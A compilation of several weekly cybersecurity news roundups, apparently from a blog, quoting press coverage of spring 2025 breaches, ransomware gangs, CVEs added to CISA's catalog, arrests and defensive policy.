    • “A bipartisan Senate bill would formally ban the use of DeepSeek by federal contractors, part of a larger effort to keep the Chinese-made large language model out of government systems and networks, where lawmakers fear it could pose cybersecurity and national security concerns.
    • “The bill, introduced by Sens. Bill Cassidy, R-La., and Jacky Rosen, D-Nev., would bar federal contractors from using the model to carry out any activity related to a federal contract. It also blocks contractors from using any successor model developed by High Flyer, the Chinese quantitative firm that made DeepSeek.
    • “Cassidy and Rosen cited the potential that the use of DeepSeek — which acknowledges that it sends user data back to China — to carry out contract work may put sensitive federal data in the hands of the Chinese government.
    • “AI is a powerful tool which can be used to enhance things like medicine and education,” Cassidy said in a statement. “But in the wrong hands, it can be weaponized. By feeding sensitive data into systems like DeepSeek, we give China another weapon.” 
  • and
    • “Authorities in Poland have arrested four people accused of administrating and selling access to distributed denial of service (DDoS) services, according to a press release from Europol.  
    • “The suspects are believed to have operated six so-called “stresser” or “booter” services that enabled customers across the world to launch thousands of attacks on targets ranging from government offices to businesses and schools. From 2022 to 2025, the platforms — identified as Cfxapi, Cfxsecurity, neostress, jetstress, quickdown, and zapcut — allegedly allowed users to bombard websites and servers with high volumes of junk traffic, often rendering them inaccessible. 
    • “The services, which offered easy-to-navigate interfaces, required minimal user knowledge: attackers could select a target, choose the attack specifications, and pay as little as 10 euros for each disruption, according to Europol.
    • “The arrests in Poland were part of a coordinated law enforcement response spanning four countries and supported by Europol. In addition to the Central Cybercrime Bureau in Poland, the investigation was supported by German Federal Criminal Police Office, the Prosecutor General’s Office in Frankfurt, the Dutch National Police, and multiple U.S. agencies, including the Department of Justice, FBI, Homeland Security Investigations (HSI), and Defense Criminal Investigative Service (DCIS).” 

From the cybersecurity breaches and vulnerabilities front,

  • Bleeping Computer tells us,
    • “Ascension, one of the largest private healthcare systems in the United States, has revealed that the personal and healthcare information of over 430,000 patients was exposed in a data breach disclosed last month.
    • “As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
    • “Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician’s name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).” * * *
    • “Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in third-party software used by the former business partner.” * * *
    • “Although Ascension didn’t share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
    • “Last year, Ascension notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.”
  • and
    • “Cisco has fixed a maximum severity flaw in IOS XE Software for Wireless LAN Controllers by a hard-coded JSON Web Token (JWT) that allows an unauthenticated remote attacker to take over devices.
    • “This token is meant to authenticate requests to a feature called ‘Out-of-Band AP Image Download.’ Since it’s hard-coded, anyone can impersonate an authorized user without credentials.
    • “The vulnerability is tracked as CVE-2025-20188 and has a maximum 10.0 CVSS score, allowing threat actors to fully compromise devices according to the vendor.”
  • Cybersecurity Dive informs us,
    • “A second wave of cyberattacks is targeting a critical vulnerability in SAP NetWeaver Visual Composer, according to researchers.
    • “Following the initial round of threat activity disclosed in April, opportunistic threat actors are leveraging webshells that were previously established through exploitation of CVE-2025-31324. The vulnerability, with a CVSS score of 10, allows unauthenticated attackers to upload arbitrary files and take full control of a system, according to researchers at Onapsis.
    • “Onapsis and Mandiant are tracking hundreds of confirmed compromises worldwide, with the cases spanning across multiple industries, including utilities, manufacturing, oil and gas and other critical infrastructure sectors. 
    • “The Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its known exploited vulnerabilities catalog in late April.” 
  • Cyberscoop adds,
    • “Vulnerabilities are proliferating in SonicWall devices and software this year, putting the vendor’s customers at risk of intrusion via secure access gateways and firewalls.
    • “The year started off on a sour note for the California-based company when it released security advisories for nine vulnerabilities on Jan. 7. The total number of vulnerabilities publicly disclosed by the company so far in 2025 has grown to 20. 
    • “SonicWall vulnerabilities are also making a consistent appearance on the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities (KEV) catalog. Cyber authorities confirm that attackers exploited four vulnerabilities in SonicWall products so far this year, and 14 total since late 2021.
    • “Eight of those vulnerabilities have been exploited in ransomware campaigns, according to CISA.”
  • Bleeping Computer adds,
    • “SonicWall has urged its customers to patch three security vulnerabilities affecting its Secure Mobile Access (SMA) appliances, one of them tagged as exploited in attacks.
    • “Discovered and reported by Rapid7 cybersecurity researcher Ryan Emmons, the three security flaws (CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821) can be chained by attackers to gain remote code execution as root and compromise vulnerable instances.
    • “The vulnerabilities impact SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices and are patched in firmware version 10.2.1.15-81sv and higher.”
  • CISA added four known exploited vulnerabilities to its catalog this week.
  • May 5, 2025
    • CVE-2025-3248 Langflow Missing Authentication Vulnerability
    • Dark Reading discusses this KVE here.
  • May 6, 2025
    • CVE-2025-27363 FreeType Out-of-Bounds Write Vulnerability
    • Hacker News discusses this KVE here.
  • May 7, 2025
    • CVE-2024-6047 GeoVision Devices OS Command Injection Vulnerability
    • CVE-2024-11120 GeoVision Devices OS Command Injection Vulnerability
    • SC Media discusses these KVEs here.

From the ransomware front,

  • Dark Reading reports,
    • “Email-based attacks continued to cost enterprises big bucks in 2024, according to new cyber-insurance claims data.
    • “Cyber-insurance carrier Coalition published its “2025 Cyber Claims Report” on May 7, showing that business email compromise (BEC) attacks and fund transfer fraud (FTF) accounted for 60% of all the company’s claims last year. BEC attacks were particularly problematic for customers, according to Coalition; claims severity for such threats increased 23%, with incident’s costing organizations, on average, $35,000.
    • “That dollar figure is a far cry from the average loss for ransomware attacks in 2024, which Coalition said was $292,000. However, the claims report, which features data from customers in the US, the UK, Canada, and Australia, offered some encouraging data points, including a 7% drop in ransomware claims severity and a 3% decline in claims frequency.
    • “Additionally, Coalition found that FTF claims severity fell dramatically by 46%, to an average loss of $185,000, while claims frequency dropped 2%. Overall, the cyber-insurance carrier said it observed “remarkable year-over-year (YoY) stability” for claims, despite an intensifying threat landscape where financially motivated attackers continue to develop novel techniques and exploit new vulnerabilities.”
  • The Hacker News relates,
    • “Threat actors with ties to the Qilin ransomware family have leveraged malware known as SmokeLoader along with a previously undocumented .NET compiled loader codenamed NETXLOADER as part of a campaign observed in November 2024.
    • “NETXLOADER is a new .NET-based loader that plays a critical role in cyber attacks,” Trend Micro researchers Jacob Santos, Raymart Yambot, John Rainier Navato, Sarah Pearl Camiling, and Neljorn Nathaniel Aguas said in a Wednesday analysis.
    • “While hidden, it stealthily deploys additional malicious payloads, such as Agenda ransomware and SmokeLoader. Protected by .NET Reactor 6, NETXLOADER is difficult to analyze.”
    • Qilin, also called Agenda, has been an active ransomware threat since it surfaced in the threat landscape in July 2022. Last year, cybersecurity company Halcyon discovered an improved version of the ransomware that it named Qilin.B.”
  • Per Bleeping Computer,
    • “The Play ransomware gang has exploited a high-severity Windows Common Log File System flaw in zero-day attacks to gain SYSTEM privileges and deploy malware on compromised systems.
    • “The vulnerability, tracked as CVE-2025-29824, was tagged by Microsoft as exploited in a limited number of attacks and patched during last month’s Patch Tuesday.
    • “The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia,” Microsoft said in April.”
  • The Wall Street Journal reports,
    • “The hacking group that once shut down half the Las Vegas Strip has returned and is causing turmoil at U.K. retailers.
    • “The hackers call themselves Star Fraud but are more widely known as Scattered Spider, a collective of largely young men and teenagers that have wreaked havoc across industries in recent years.
    • “U.K. retailers Harrods, Marks & Spencer MKS -1.05%decrease; red down pointing triangle and Co-op have all reported cyber intrusions in the past two weeks. Scattered Spider hasn’t been publicly named as the culprit of the hacks, but is suspected in at least some of them, according to people familiar with the investigation.
    • “The attacks bear all the hallmarks of Scattered Spider attacks, disrupting online sales and certain payments and leading to the theft of customer data. The stores have remained open.
    • “The group’s hackers “typically work their way through a sector, so other retailers should take the opportunity to harden their defenses,” said John Hultquist, chief analyst with Google’s Mandiant cybersecurity investigations group.” 
  • Per Cyberscoop,
    • “Five months after education software vendor PowerSchool paid an unnamed threat actor a ransom in exchange for the deletion of sensitive stolen data, some of the company’s customers are now receiving extortion demands. 
    • “A threat actor, who may or not be the same criminal group behind the attack, has contacted four school district customers of PowerSchool in the past few days, CyberScoop has learned, threatening to leak data if they don’t pay. 
    • “The downstream extortion attacks highlight the ongoing risk organizations confront when a vendor is hit by a cyberattack, exposing not just their data but also that of others in their supply chain. The follow-on extortion attempts also underscore that paying ransoms for data does not guarantee stolen data won’t be leaked.”
  • Dark Reading reports,
    • “The notorious ransomware gang LockBit appeared to suffer another setback this week after its network was compromised by an unknown adversary.
    • “On May 7, a range of security researchers observed that LockBit’s Dark Web leak site had been altered. Instead of listing victim organizations, the site now features a simple message: “Don’t do crime CRIME IS BAD xoxo from Prague,” along with a link to a zip archive.
    • “The archive, according to analysis from Qualys yesterday, among others, includes a SQL database file from LockBit’s affiliate panel. Coalition researchers, meanwhile, noted the file includes extensive internal data from the ransomware-as-a-service operation, including nearly 60,000 Bitcoin addresses and more than 4,000 chats with victim organizations from between Dec. 19, 2024, and April 29, 2025.
    • “The file also contains information on more than 70 LockBit administrators and affiliates, researchers noted, including plaintext passwords, as well individual builds and configurations of the LockBit ransomware code. However, the leaked data did not include decryptors or private keys.”

From the cybersecurity defenses front,

  • CISA announced,
    • “The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE)—hereafter referred to as “the authoring organizations”—are aware of cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States. The authoring organizations urge critical infrastructure entities to review and act now to improve their cybersecurity posture against cyber threat activities specifically and intentionally targeting internet connected OT and ICS.”
    • Mitigations and resources are included in the announcement.
  • Bank Info Security lets us know that “Despite the rise of artificial intelligence and automation, human ingenuity remains a critical asset in defending against cyberthreats, said Kara Sprague, CEO at HackerOne.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity and law enforcement front,

  • Cyberscoop reports,
    • “Homeland Security Secretary Kristi Noem outlined her plans Tuesday to refocus the Cybersecurity and Infrastructure Security Agency (CISA) on protecting critical infrastructure from increasingly sophisticated threats — particularly from China — while distancing the agency from what she characterized as mission drift under previous leadership.
    • “Speaking at the 2025 RSAC Conference, Noem provided the most detailed vision yet of how the current administration is pushing CISA to a “back-to-basics” approach aimed at hardening defenses against adversaries who have demonstrated capabilities to infiltrate critical systems.”
  • and
    • “Threat intelligence sharing is flowing between the private sector and federal government and remains unimpeded thus far by job losses and budget cuts across federal agencies that support the cyber mission, according to executives at major security firms.
    • “Top brass at Amazon, CrowdStrike, Google and Palo Alto Networks said there’s been no change to interactions with the federal government since President Donald Trump was inaugurated earlier this year.
    • “Across multiple interviews and media briefings during the RSAC 2025 Conference this week, none of the leaders at these top cybersecurity companies conveyed any concern about or experience with communication breakdowns. Each of them dismissed the idea that collaboration has slowed down amid significant workforce reductions and strategic changes across the federal government.”
  • Earlier this week, the National Institute of Standards and Technology released its FY 2024 Cybersecurity & Privacy Program Annual Report.
  • Federal News Network tells us,
    • “While much of the cybersecurity community’s attention was out west at the annual RSA Conference, the Justice Department announced yet another settlement in its pursuit of contractors who falsely attest to meeting cybersecurity requirements.
    • “DoJ announced today that Raytheon Company, RTX Corporation and Nightwing Group have agreed to pay $8.3 million to settle allegations that Raytheon violated the False Claims Act by falling short of contractually mandated cybersecurity standards.
    • “RTX sold its cybersecurity, intelligence and services business to Nightwing in 2024. DoJ’s case centered on conduct between 2015 and 2021, prior to the acquisition.
    • “The case is another feather in the cap for DoJ’s Civil-Cyber Fraud Initiative. Started under the Biden administration, the goal of the initiative is to enforce cybersecurity requirements that many contractors had been ignoring through the False Claims Act.”
  • Per the Hacker News,
    • “The U.S. Department of Justice (DoJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying the Black Kingdom ransomware against global targets, including businesses, schools, and hospitals in the United States.
    • “Rami Khaled Ahmed of Sana’a, Yemen, has been charged with one count of conspiracy, one count of intentional damage to a protected computer, and one count of threatening damage to a protected computer. Ahmed is assessed to be currently living in Yemen.
    • “From March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin,” the DoJ said in a statement.”
  • Cyberscoop adds,
    • “Federal authorities extradited a Ukrainian citizen to the United States on Wednesday to face charges for participating in a series of ransomware cyberattacks on organizations based in the U.S. and multiple European countries. 
    • “Artem Stryzhak, 35, was arrested in Spain in June 2024 and was scheduled to appear for arraignment Thursday in the U.S. District Court for the Eastern District of New York. Stryzhak is accused of conspiracy to commit fraud and related activity, including extortion.
    • “Prosecutors accuse Stryzhak and his co-conspirators of using Nefilim ransomware to encrypt computer networks in the U.S., Canada, France, Germany, Australia, the Netherlands, Norway and Switzerland between late 2018 to late 2021.
    • “As alleged, the defendant was part of an international ransomware scheme in which he conspired to target high-revenue companies in the United States, steal data, and hold data hostage in exchange for payment. If victims did not pay, the criminals then leaked the data online,” John Durham, U.S. attorney for the Eastern District of New York, said in a statement.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “Hackers are increasingly using AI in their attacks and defenders should follow suit, Check Point Software Technologies said in a report published Wednesday.
    • “The company’s AI security report, announced at the 2025 RSAC Conference in San Francisco, also found that one in 13 generative AI prompts contained potentially sensitive information, and one in every 80 prompts posed “a high risk of sensitive data leakage.”
    • “Unauthorized AI tools, data loss, and AI platform vulnerabilities topped the list of AI risks for enterprises, according to Check Point.”
  • and
    • “In a report published Tuesday, Google said it saw hackers exploit fewer zero-day vulnerabilities in the wild in 2024 than in 2023.
    • “The company attributed the decrease to improvements in secure software development practices.
    • “Still, Google said it is seeing a “slow but steady” increase in the rate of zero-day exploitation over time.”
  • CISA added eight known exploited vulnerabilities to its catalog this week.
  • April 28, 2025
    • CVE-2025-1976 Broadcom Brocade Fabric OS Code Injection Vulnerability
    • CVE-2025-42599 Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability
    • CVE-2025-3928 Commvault Web Server Unspecified Vulnerability”
    • Bleeping Computer discusses these KVEs here.
  • April 29, 2025
    • CVE-2025-31324 SAP NetWeaver Unrestricted File Upload Vulnerability”
    • Cybersecurity Dive discusses this KVE here.
  • May 1, 2025
    • CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability
    • CVE-2023-44221 SonicWall SMA100 Appliances OS Command Injection Vulnerability
    • Cybersecurity News discusses the Apache KVE here.
    • Bleeping Computer discusses the SonicWall KVE here.
  • May 2, 2025
    • CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability
    • CVE-2024-58136 Yiiframework Yii Improper Protection of Alternate Path Vulnerability”
    • Security Affairs discusses these KVEs here.

From the ransomware front,

  • Techradar points out,
    • New research has revealed the scale of recent ransomware revolution, warning it remains a dominant threat to organizations worldwide.
    • Veeam study, which gathered insights from 1,300 CISOs, IT leaders, and security professionals across the Americas, Europe, and Australia, found nearly three-quarters of businesses were impacted by ransomware over the past year.
    • Cybersecurity measures seem to be having some effect, with businesses facing ransomware incidents dropping slightly from 75% to 69% – and ransomware payments are also decreasing, as in 2024, 36% of affected businesses chose not to pay, and 60% of those who did paid less than half of the demanded ransom.
  • Dark Reading adds,
    • “Several high-profile retailers based in the UK have suffered cyberattacks in recent weeks, and all signs point to two possible threat actors being behind the campaign.
    • “The National Cyber Security Centre (NCSC), the UK’s primary cyber agency, said on May 1 that it was tracking a series of attacks impacting retailers. NCSC CEO Dr. Richard Horne said in an included statement that the agency was working with affected organizations and that “these incidents should act as a wake-up call to all organizations.”
    • “Co-Op, Marks & Spencer, and Harrods are among the retailers that have confirmed attacks in recent weeks. In an article published May 2, Bloomberg News reported a spokesperson for the DragonForce ransomware gang — a group that emerged as a ransomware-as-a-service (RaaS) player in 2023 — took credit for the attacks against all three retailers.
    • “Last month, researchers from Sophos’ Secureworks reported that DragonForce had an RaaS model where affiliates could create their own “brand,” using DragonForce’s ransomware or using their own tools for extortion attacks.”
  • and
    • “The notorious Scattered Spider threat group continues to attack high-value targets despite landing on the receiving end of multiple global law enforcement operations.
    • “Scattered Spider gained notoriety in recent years with high-profile breaches and ransomware attacks against large enterprises, including Las Vegas casino and hotel giants Caesars Entertainment and MGM Resorts in 2023. First emerging in 2022, the group’s members displayed a knack for social engineering schemes that allowed them to steal credentials from targeted organizations and gain privileged access into their networks. * * *
    • Bleeping Computer this week reported that the cyberattack against British retail giant Marks & Spencer was perpetrated by members of the group using DragonForce ransomware. Earlier this month, threat intelligence vendor Silent Push said it had observed significant threat activity, specifically phishing campaigns targeting well-known brands this year, from Chick-fil-A to Louis Vuitton.
  • and
    • “RansomHub, an aggressive ransomware-as-a-service (RaaS) operation that gained prominence over the past year in the wake of law enforcement actions against LockBit and ALPHV, appears to have abruptly gone dark earlier this month.
    • “In a new report this week that offers an in-depth look at RansomHub’s affiliate recruitment methods, negotiation tactics, and aggressive extortion strategies, researchers at Group-IB described the operation as inactive since April 1.
    • “Cybercriminals associated with the operation may have migrated to the Russian-language speaking Qilin RaaS operation and are continuing their attacks under that banner, Group-IB said. The security vendor did not offer any explanation for the rapidly growing RansomHub operation’s seemingly sudden and unexpected demise — if that is indeed what it is.”
  • TechTarget offers a “look at the [seven] distinct stages of the ransomware lifecycle to better understand how attackers strike — and how defenders might be better able to resist.

From the cybersecurity defense front,

  • Cyberscoop reports
    • “Leaders of various federal research agencies and departments outlined a vision Tuesday for the future of critical infrastructure security, emphasizing the promise of combining formal software development methods with large language models (LLMs). 
    • “Acting DARPA Director Rob McHenry told an audience at the RSAC 2025 Conference that such a combination could “virtually eliminate software vulnerabilities” across foundational system infrastructures, a departure from the traditionally accepted risks of software flaws.
    • “We’ve all been trained in a world where we have to accept that there are vulnerabilities in our software, and bad guys exploit those vulnerabilities,” he said. “We try to mitigate the damage and patch them, and we go round on this merry-go-round. That technologically does not need to be true anymore.”
    • “DARPA’s statements came in the context of the AI Cyber Challenge, a public-private collaboration involving industry leaders such as Google, Microsoft, Anthropic and OpenAI. The initiative tests whether advanced AI systems can identify and patch vulnerabilities in open-source software components vital to the electric grid, health care, and transportation.”
  • and
    • “Cryptography experts say the race to fend off future quantum-computer attacks has entered a decisive but measured phase, with companies quietly replacing the internet plumbing that the majority of the industry once considered unbreakable.
    • “Speaking at Cloudflare’s Trust Forward Summit on Wednesday, encryption leaders at IBM Research, Amazon Web Services and Cloudflare outlined how organizations are refitting cryptographic tools that safeguard online banking, medical data and government communications. The aim is to stay ahead of quantum machines that, once powerful enough, could decode the math protecting today’s digital traffic.
    • “Over the next five to 10 years you’re going to see a Cambrian explosion of different cryptographic systems,” said Wesley Evans, a product manager for Cloudflare’s research team, referring to an evolutionary period with a rapid diversification of animal life that occurred roughly 540 million years ago.” 
  • Dark Reading adds,
    • “Each year, top SANS faculty joins the RSAC conference to present what their community of practitioners and researchers see as the most pressing challenges facing the cybersecurity community for the year to come. This year’s list of top-five threats aren’t merely technical, and tackling them will demand coordinated leadership from the very top of the organization and beyond.
    • “The attack techniques outlined in the SANS RSAC 2025 keynote underscore a common theme: Cybersecurity is no longer confined to the security operations center — it’s a leadership issue that impacts every layer of the enterprise,” according to a SANS media statement. “The threats of tomorrow demand a strategic, integrated response rooted in visibility, agility, and cross-functional alignment.”
  • Bleeping Computer notes,
    • “Microsoft has announced that all new Microsoft accounts will be “passwordless by default” to secure them against password attacks such as phishing, brute force, and credential stuffing.
    • “The announcement comes after the company started rolling out updated sign-in and sign-up user experience (UX) flows for web and mobile apps in March, optimized for passwordless and passkey-first authentication.
    • “As part of this simplified UX, we’re changing the default behavior for new accounts. Brand new Microsoft accounts will now be ‘passwordless by default’,” said Joy Chik, Microsoft’s President for Identity & Network Access, and Vasu Jakkal, Corporate Vice President for Microsoft Security.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity

From the cybersecurity policy and law enforcement front,

  • Cyberscoop reports,
    • “The Cybersecurity and Infrastructure Security Agency will soon have a new second-in-command.
    • Madhu Gottumukkala has been named deputy director. He comes over to CISA from his prior position in the South Dakota government, where Kristi Noem was most recently governor before taking over as secretary of the Department of Homeland Security. Gottumukkala had been commissioner of the Bureau of Information and Telecommunication (BIT) and state chief information officer.
    • “He’ll leave BIT on May 16. A CISA spokesperson confirmed that Gottumukkala would become deputy director of the agency.”
  • CISA gives us the results of the President’s Cup competition and also announced on April 23,
    • “The [Critical Vulnerabilities and Exposures] CVE Program is an invaluable public resource relied upon by network defenders and software developers alike. As the nation’s cyber defense agency, it is a foundational priority for CISA. Recent public reporting inaccurately implied the program was at risk due to a lack of funding. To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse. There has been no interruption to the CVE program and CISA is fully committed to sustaining and improving this critical cyber infrastructure. 
    • CISA is proud to be the sponsor for the CVE program, a role we have held for decades. During this time, the CVE Program has gone through many evolutions, and this opportunity is no exception. MITRE, CISA, and the CVE Board have transformed this program into a federated capability with 453 CVE Numbering Authorities (CNAs). This growth has enabled faster and more distributed CVE identification, providing valuable vulnerability information to the public and enabling defenders to take quick action to protect themselves. We have historically been and remain very open to reevaluating the strategy to support the continued efficacy and value of the program.  
    • We also recognize that significant work lies ahead. CISA, in coordination with MITRE and the CVE Board, is committed to actively seeking and incorporating community feedback into our stewardship of the CVE Program. We are committed to fostering inclusivity, active participation, and meaningful collaboration between the private sector and international governments to deliver the requisite stability and innovation to the CVE Program. And we are committed to achieving these goals together.
  • Bleeping Computer tells us,
    • “The FBI has asked the public for information on Chinese Salt Typhoon hackers behind widespread breaches of telecommunications providers in the United States and worldwide.
    • “In October, the FBI and CISA confirmed that the Chinese state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream) and many other telecom companies in dozens of countries.
    • “As revealed at the time, while they had access to the U.S. telecoms’ networks, the attackers also accessed the U.S. law enforcement’s wiretapping platform and gained access to the “private communications” of a “limited number” of U.S. government officials.”
  • The HHS Office for Civil Rights announced,
    • “Today [April 25], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Comprehensive Neurology, PC (Comprehensive), a small New York neurology practice, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule. The settlement resolves an OCR investigation of a [2020] ransomware attack against Comprehensive.” * * *
    • “Under the terms of the settlement, Comprehensive agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $25,000 to OCR.”
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-racap-np.pdf, opens in a new tab [PDF, 245 KB]
  • and
    • “Today [April 23], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with PIH Health, Inc. (PIH), a California health care network, over potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The violations stem from a phishing attack that exposed unsecured electronic protected health information (ePHI), prompting concerns related to the Privacy, Security, and Breach Notification Rules under HIPAA.” * * *
    • “The settlement resolves an investigation that OCR conducted after receiving a breach report from PIH in January 2020. The breach report stated that in June 2019, a phishing attack compromised forty-five of its employees’ email accounts, resulting in the breach of 189,763 individuals’ unsecured ePHI. PIH reported that the ePHI disclosed in the phishing attack included affected individuals’ names, addresses, dates of birth, driver’s license numbers, Social Security numbers, diagnoses, lab results, medications, treatment and claims information, and financial information.”
    • “Under the terms of the resolution agreement, PIH has agreed to implement a corrective action plan that will be monitored by OCR for two years and paid a $600,000 settlement to OCR.” * * *
    • The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance enforcement/agreements/index.html.

Three important reports were released this week.

  • Per Cyberscoop,
    • “It looks like 2024 was a record year in cybercrime for all the wrong reasons, according to the FBI’s annual Internet Crime Complaint Center (IC3) report released Wednesday. 
    • “As cyber-enabled fraud and ransomware continue to harm individuals, businesses, and critical infrastructure, the report, now in its 25th year, provides crucial insight into evolving criminal tactics and their nationwide impact. The report is overflowing with key trends, case data, and other statistics from the FBI’s ongoing efforts to combat the cyberthreat landscape.”
  • and
    • “Cybercriminals and state-sponsored threat groups exploited vulnerabilities and initiated ransomware attacks with vigor last year, escalating the scope of their impact by hitting more victims and outmaneuvering defenses with speed.
    • “The rate of ransomware detected in data breaches jumped 37%, occurring in 44% of the 12,195 data breaches reviewed in Verizon’s 2025 Data Breach Investigations Report released Wednesday. Researchers observed the presence of ransomware in 32% of data breaches in last year’s report. 
    • “Verizon’s research underscores the twists and turns of cybercriminal activity and its wide-reaching impact on organizations. “We see less payment activity,” Alex Pinto, associate director of threat intelligence at Verizon Business, told CyberScoop, “but we don’t see it slowing down.”
  • Per Cybersecurity Dive,
    • “Threat actors motivated by financial gain continue to rise in prominence, representing 55% of all cyber actors during 2024, according to a report by Mandiant. The figures show a steady increase from 52% in 2023 and 48% in 2022. 
    • “Exploits remained the most common initial access vector for the fifth consecutive year, representing 33% of exploits overall, according to the Mandiant M-Trends 2025 report. However, stolen credentials become the second most common initial access point for the first time, indicating a rising trend. 
    • “Cyber threat groups are increasingly targeting unsecured data repositories as poor security hygiene continues to leave organizations at risk.”

From the cyber vulnerabilities and breaches front,

  • Healthcare Dive reports,
    • “A data breach at Yale New Haven Health has exposed the information of about 5.6 million people, according to a report submitted to federal regulators earlier this month.
    • “The Connecticut-based health system detected unusual activity on its IT systems in early March, Yale New Haven said in a press release. An investigation later found an unauthorized third party had gained access to its network and stole copies of some patient data. 
    • “The incident is the largest healthcare breach reported to federal regulators so far in 2025, according to a portal managed by the HHS’ Office of Civil Rights.”
  • and
    • “A data breach at Blue Shield of California exposed information from 4.7 million people, according to a notice filed with federal regulators earlier this month. 
    • “In February, the insurer learned that Google Analytics, a vendor Blue Shield employs to track use of its websites, was sharing member data with the advertising service Google Ads from April 2021 through January 2024, according to a breach notice. 
    • “Blue Shield can’t confirm whether any particular beneficiary’s information is affected due to “the complexity and scope of the disclosures,” so the insurer is notifying all members who could have accessed their information on affected websites during the nearly three-year period.” 
  • Cybersecurity Dive tells us,
    • “Conduent Inc. warned in an April 14 regulatory filing with the Securities and Exchange Commission that a “significant” number of people had their personal data stolen in a January cyberattack that affected a limited number of the company’s clients.
    • “The company, a major government payments technology vendor for social services and transit systems, was targeted in a Jan. 13 attack that disrupted certain operations. 
    • “The company warned it has incurred and accrued a material amount of nonrecurring expenses related to the breach. A spokesperson for the company did not have specific numbers yet, but a breach notification has already been posted by the California Attorney General’s office.”
  • andInfor
    • Threat groups from across the globe are increasingly weaponizing older vulnerabilities for exploitation, according to a report released Wednesday by GreyNoise Intelligence
    • More than half of these resurgent vulnerabilities affect edge technologies, the report shows. Nearly seven out of 10 of the most unpredictable vulnerabilities — known as Black Swan vulnerabilities — affect edge technologies.
    • Almost 40% of Black Swan vulnerabilities specifically affect VPNs and routers, according to the report.
  • Per Cyberscoop,
    • “Attackers exploited nearly a third of vulnerabilities within a day of CVE disclosure in the first quarter of 2025, VulnCheck said in a report released Thursday. The company, which focuses on vulnerability threat intelligence, identified 159 actively exploited vulnerabilities from 50 sources during the quarter.
    • “The time from CVE disclosure to evidence of exploitation in the first quarter was marginally faster than what VulnCheck observed during 2024, Patrick Garrity, security researcher at the company, said in the report. “This demonstrates the need for defenders to move fast on emerging threats while continuing to burn down their vulnerability debt,” Garrity wrote. 
    • “VulnCheck’s research reinforces multiple recent reports that warned about increased exploits in 2024. Mandiant said exploits were the most common initial infection vectorlast year, representing 1 of every 3 attacks. Verizon reported a 34% increase in exploited vulnerabilities, and IBM X-Force said exploitation of public-facing applications accounted for 30% of incident response cases last year.”
  • and
    • “Attackers are having a field day with software defects in security devices, according to a new report released Wednesday by Mandiant. 
    • “Exploits were the most common initial infection vector, representing 1 of every 3 attacks in 2024, and the four most frequently exploited vulnerabilities were all contained in edge devices, such as VPNs, firewalls and routers, Mandiant said in its M-Trends report released Wednesday.
    • “Exploitation of these vulnerabilities represented slightly less than half of all observed vulnerability exploitation,” said Kirstie Failey, principal threat analyst at Google Threat Intelligence Group, under which the Mandiant brand operates.
    • “Threat researchers and federal cyber authorities have been sounding the alarm about attacks targeting network edge devices for more than a year. Since 2024, security device exploits have resulted in attacks on government agencies and some of the most valuable publicly-traded companies in the world.”
  • Per Cybersecurity Dive,
    • “Security researchers warn that hackers are actively exploiting a critical unrestricted-file-upload vulnerability in SAP NetWeaver Visual Composer. 
    • “The vulnerability, tracked as CVE-2025-31324, could allow an unauthenticated user to upload malicious executable binaries. The vulnerability has a severity score of 10.  
    • “Researchers from Reliaquest disclosed the vulnerability to SAP after an investigation uncovered attackers uploading JSP webshells into publicly accessible directories.” 
  • FEHBlog note: CISA did not add a known exploited vulnerability to its catalog this week.

From the ransomware front,

  • Palo Alto Networks issued a report on extortion and ransomware trends in the first quarter of 2025.
  • Dark Reading reports,
    • “The ransomware-as-a-service model is perpetually troubling for dropping the barrier to entry for aspiring ransomware actors, and two threat actors are innovating in the space with additional affiliate models.
    • “Extended detection and response vendor Secureworks (owned by Sophos) published research today detailing expanded affiliate models belonging to ransomware-as-a-service (RaaS) gangs DragonForce and Anubis.
    • “As a model, ransomware-as-a-service (RaaS) has gained significant popularity in recent years. A threat actor typically sells or leases many of the tools a less experienced cybercriminal (or affiliate) would need to conduct a ransomware attack; the affiliate typically shares the proceeds from subsequent attacks with the operator.
